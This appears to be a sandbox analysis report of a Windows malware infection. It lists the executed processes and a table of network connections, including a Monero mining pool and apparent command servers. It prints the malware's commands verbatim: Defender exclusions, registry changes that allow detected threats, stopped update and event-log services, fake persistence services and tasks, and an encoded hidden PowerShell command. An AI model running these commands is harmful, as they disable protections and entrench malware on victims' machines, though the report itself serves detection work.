C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\qEyOWBL.exe\" it /CMsdidNczE 385118 /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe\" it /PdldidFsHw 385118 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\9C20.bat" "
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\system32\taskeng.exe
taskeng.exe {A0C7BAAC-E03D-419F-BDCD-85EABDCF3FBD} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\C1BA.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240514010344.log C:\Windows\Logs\CBS\CbsPersist_20240514010344.cab
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe
"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe
"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"
C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe
"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe
"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBaxREWWY" /SC once /ST 00:14:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBaxREWWY"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBaxREWWY"
Network
| Country | Destination | Domain | Proto |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| RU | 77.221.151.47:80 | 77.221.151.47 | tcp |
| RU | 185.215.113.67:26260 | tcp | |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | file-file-host6.com | udp |
| RU | 5.101.50.183:80 | file-file-host6.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 77.221.151.47:9090 | tcp | |
| RU | 5.42.96.64:80 | 5.42.96.64 | tcp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 8.8.8.8:53 | 1xst.ru | udp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| RO | 109.98.58.98:80 | 1xst.ru | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| RO | 109.98.58.98:80 | 1xst.ru | tcp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | parrotflight.com | udp |
| US | 172.67.187.204:443 | parrotflight.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | junglethomas.com | udp |
| US | 172.67.197.33:443 | junglethomas.com | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| DE | 151.236.118.173:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 3.162.143.213:80 | sd.p.360safe.com | tcp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| MX | 189.130.155.217:80 | sdfjhuz.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | www.safeautomationbd.com | udp |
| BD | 103.174.152.66:443 | www.safeautomationbd.com | tcp |
| BD | 103.174.152.66:443 | www.safeautomationbd.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 77.221.151.47:9090 | tcp | |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
| RU | 5.101.50.183:80 | trad-einmyus.com | tcp |
